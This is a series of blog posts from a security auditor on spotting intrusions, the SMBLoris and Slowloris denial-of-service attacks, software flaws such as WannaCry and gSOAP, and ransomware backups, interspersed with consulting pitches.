How Can You Tell If Hackers Are Hacking You?

Obviously if you have been hacked and have ransomware that is too late to know that you have been hacked:

I would like to discuss how we can find out if hackers are altering your files or are looking around in your network. There are several ways to explain what is happening when a criminal hacker is trying to attack your machines. Usually it starts with reconnaissance of your computers, online profile and other system methods.


The cybersecurity  industry has  created something called the Cyber Kill Chain which explains this phenomena(how does a criminal hacker attack you). CSOonline explains it a little… But Cyber Kill Chain was created by Lockheed Martin, a defense contractor with defense terminology.

Advanced (targeted)                 Persistent(month after month)       Threat (person with intent, opportunity and capability)


The cybersecurity industry is obsessed with this Cyber Kill Chain – why? because the explanation is a good method of detailing the steps an attacker uses to find a way into your network.

If you think about it there must be a way for us to explain how an attacker attacks, so that we can look and find this attack.

I tried to use less technical  terms with my SVAPE & C diagram using the Mandiant attack analysis of the Chinese hackers.

Scan Vulnerability Analysis – Penetrate Exploit and Control  – i.e. SVAPE & C

The portion of criminal attack we want to dissect is the Penetrate and Exploit.  In other words, recon has already been done, vulnerabilities analyzed, and reviewed.Or as in the Cyber Kill Chain, somewhere between delivery, exploitation, and installation.

Now the attacker is actually trying to take over the machine, by exploiting the system somehow.

What is it that we are looking for? If a system is being altered by a human being the event logs  will also be altered. So keeping an eye on event logs is a good idea.

But if this attack is by an automated program (bot or virus or other malware) then the event logs will only be changed if the bot decides to do this, so likely the bot needs to send information back to the programmer at some point (information like cc numbers, health info, whatever data that you keep on your computer).

How do these criminal hackers attack your computers?

It turns out they use the same techniques as people in DEFCON 25 would (latest convention in Las Vegas). So you can browse through the media server to see what the presentations were.

I like the Leveraging-Powershell-Basics by Carlos Perez

In this presentation the theme is to run little known commands using Powershell which you have to be looking for when trying to find hackers in your network.

The Powershell commands can perform many things for the hackers, and to find out whether commands are run you must turn on advanced auditing enabled, some command line jiu-jitsu is also required.  Hackerhurricane Blog discusses the commands  and settings in Win7 and Windows 2008  and later.

So the key is to find what the hackers do and then try to detect these types of actions.  But then there is another issue, including making sure there are people to modify the scripts to detect the criminal hackers.

Target had the methods(detection) but failed in personnel to act on the detection, because one has to find the real problem within the many false positives.

Most important there must be a will to defend and act.

Contact Us to review your plans, we can audit your defensive plans.


Doing the Basics Would Have Saved You

A new Zero-Day attack is out available for attackers. this attack was discussed in the SANS website Internet Storm Center:

SMBLoris – the new SMB flaw

The article was written from reviewing a Threatpost article, but was ultimately triggered because of the DEFCon 2017 presentation:


Notice the arrows on right with memory usage on a webserver going close to 100%.

What makes this attack (DOS – Denial Of Service) so bad is that it is easily disguised as ‘SlowLoris’ as sending partial HTTP requests to webservers (i.e. not fully connecting to the webserver). This partial connection essentially slows the webserver to a crawl when requesting enough connections.  And since this is a standard request, it is hard to distinguish friend from foe.

This is an interesting point from the webpage:

“Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win – and sooner than later.”

So this is not a simple easy to see issue. This issue abuses the way the webserver operates for the following 4 applications:


  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer

slowloris is just one variant and as hackers review this attack…  variants may get created and thus exploit this in yet unknown ways. As of this posting there is no CERT classification yet.

What do I mean about the basics?  Well, if you have a webserver it should not have port 445 open to the public:

Google Port 445 definition:

Port 445 is a SMB port, or Structured Message Block which is used in NETBIOS protocols usually in file sharing applications. Well, one should not have a webserver with port 445 open and available on the Internet.

So, if you have done the basics, i.e. not run 445 or other ports that are unnecessary than this attack will likely not affect you or at least minimally affect you.  If you had to keep everything open, it might be time to run a firewall port limiter device in front of your website.  This is a fluid issue at this time, so keep an eye out for new attacks.. Contact Us to discuss.


Remember the hacker takes advantage of poor configurations.

Contact Us to discuss auditing your environment and review the basics in IT security.




What Worked In the Past May Not Work Soon

We are always enthralled with technology and how it changes the status quo, but we also need to be aware of tactics that use technology may need to get updated.

In 2017 we are obsessing over online sales and how the smart phone is changing our world.  Now there are grumblings over automated cars and quantum computers which will upend encryption technologies and how we defend our networks.

Do you remember this headline?

“SSL security is no longer PCI compliant”

The encryption technologies become obsolete once a method is developed by wily people to circumvent the technologies (in this case SSL)”

Yes, when quantum computing starts to crack our current ‘unbreakable’ encryption it will make us change how we try and secure data, but until then are we just worrying about nothing?

What about more effective Windows Kernel exploitation? Like in this BlackHat 2017 presentation:

The paper  shows that it is possible even with all of hte Windows10 mitigations built-in by Microsoft to bypass the kernel-mode read primitives. I.e. even the new Microsoft operating system is vulnerable to attacks.

I bring this topic up as we are not sure how the future will be, and thus we do  not know which part of our current life to change so as to ‘fix’ future problems.

Here is a very old “change decision” I am sure you know by now that the dutch had the land of what is currently called Manhatten (NY) and called it New Amsterdam (year of 1660 map below)

only 4 years after this map the city was called New York as the Dutch governor surrendered to an English expedition. The whole history is on this website: 

I am sure the Dutch going on the first expedition and creating the colony in 1626 did not think in just 34 years it will be English. Circumstances were such that the Dutch lost possession or thought it was in their interest to trade/give away what they painstakingly created.

Things change quickly, all those plans for many years and in a heartbeat all changed. Now over 300 years later we do not even remember the dutch in america (except for historians and quirky IT people).

So lets take it back to 2017… We need to plan contingencies for many different situations before they happen, otherwise events will overcome our actions and actions become reactionary and we are just trying to keep our heads above water. Or what we think is above water. What am I talking about in specific?

  1. Ransomware attacks
  2. Social media and email phishing employees of companies

Let’s keep it simple and try and devise strategies to defend against both 1 (ransomware) and 2 (phishing) attacks.

What can prevent a ransomware attack if attackers are constantly improving themselves and sometimes errors occur in your network? Maybe prevent is a bad word. Keep you in business are better words: A well designed backup strategy will make you survive all attacks even if they take your computers out. Or if a disaster occurs.

If you are a person in charge of your business what is the reasonable assumption of knowing 100% that your business will be alive next year no matter what?

Your business must have security procedures which have to include backup and recovery strategies.

Make sure that your IT department has the wherewithal to handle this new world by auditing it and receiving  reports for the future occurrences. Don’t be a standard business with no cybersecurity budget or have not backed up your files.

Since I am CISA Certified I can audit your network and computers to give you some peace of mind to.  Contact me to get peace of mind.


Cybersecurity: Challenging Onerous Tough


Overview of Cybersecurity challenges :

David Kennedy is in the above youtube video first 25 min and he has a good overview of where we are in Cybersecurity, a single employee can take down your company. It is not just the technical details, but also includes people learning best practices to defend from hacking type activities by the bad guys(black hat hacker). David also ‘hacks’ a person that came up from audience and finds her social security number in a few minutes.


The Harvard Business Review also has an article on “Why is Cybersecurity so Hard?”

The Differing Rules in Cyberspace paragraph explains why this is such a difficult subject:

Physical-world models do not work in cyberspace – you cant assign a local police department for a network that connects the whole world.

What about responsibility between government and private sector? Who is responsible for a virus infection that infected your own company and another company (due to address list emails being sent)?

When the NSA has specific bugs/hacks so that they can use to keep track and see enemies of the state that may be good for national goals, but it becomes bad when the enemy steals these hacks…

Wannacry was an NSA exploit.

Who is responsible for this software flaw in the first place? Is it Microsoft that should have known better?

The problem with Cybersecurity is that security flaws sometimes are not found until later in the software development cycle.

The flaw is found and then the vulnerability is introduced to the world, the exploit is released somehow it always is. The wannacry vulnerability was found by the NSA first, then stolen by the Russians before actually being released. But the vulnerability was there nonetheless for anyone with a unique computing talent to find.

This is actually the crux of the Cybersecurity issue: there are unique hacking computer talents that can take advantage of our computing infrastructure. Somehow there are flaws in various aspects of the operating systems or other pieces of the information technology puzzle and these computer whizkids (we call them hackers) find these flaws and create exploits so that they can make some money. The criminal underground has built a method of monetizing this phenomena with ransomware.

Here is another interesting issue that just arose:

gSOAP Flaw Leaves thousands of IoT devices vulnerable to remote code execution.

gSOAP is used in many applications and products including IoT devices (apparently as many as 34 different kinds), although this is a unique vulnerability which requires some doing to exploit it, the exploit would likely veer more towards using devices without permission such as the Mirai event as David Krebs notes.

The Mirai event was a DDOS attack, by using these IoT devices online to make the cyberattacks on various infrastructures. In this case the criminal element sells time on these illegally obtained usage rights to attack systems.

So this is another reason of the difficult problem, as the complexity of software and understanding of what happens is not trivial. The very nature of this problem then causes some confusion, or apathy. The problem only rears its ugly head when it is your software being attacked or being used.

The only way to combat this is to elevate your game and to perform audits of your IT infrastructure and software. The audits must be done to further understanding and the end result (which is to deny criminals).

Contact us to review and audit your environment.

We are CISA Certified Informations Systems Auditor


Disaster Recovery – Backups – also a Cybersecurity must

Why discuss backups and Disaster Recovery on a Cybersecurity topic?

Because what is the worst thing that can happen to your  computer data?

Oh yes ransomware will encrypt data and the only way to unencrypt is to pay the criminals. Of course there is no guarantee that after you pay the criminals the unencryption will happen without any flaws.

So what is your only solution? If you ask me the criminals with their Ransomware are forcing us to use proper IT processes and activities.  Make sure and use your Backup that you have with the backup written process so that way you are not creating something new, just recovering from a standard IT problem with data a backup is required.

So really we should have a backup and recovery process and procedure no matter what, and especially since more and more ransomware is making the pain of failure so much higher.

And ransomware is not going away, criminals are making more of them, more sophisticated with affecting more PC’s (Petya ransomware story at After petya notpetya was developed to make more money for the criminal enterprise.

The bottom line is you better create a disaster recovery process with backups and more for a real disaster and not just a ransomware disaster.

In my eyes the ransomware stories that are out there are creating more need for the disaster recovery procedures you should have.

What exactly are you waiting for? Why take the chance every day that you are going to click on something that will inevitably  link you to one of the ransomware outbreaks in the world?

Imagine revolving a gun barrel of a number of barrels (like a 100 or 500) depends on your risk and impact level. 500barrel RiskGun   If something happens out of your control the RiskGun fires and you get ransomware.

Contact me to discuss how I can review your processes and procedures to ensure your business will whether any storm.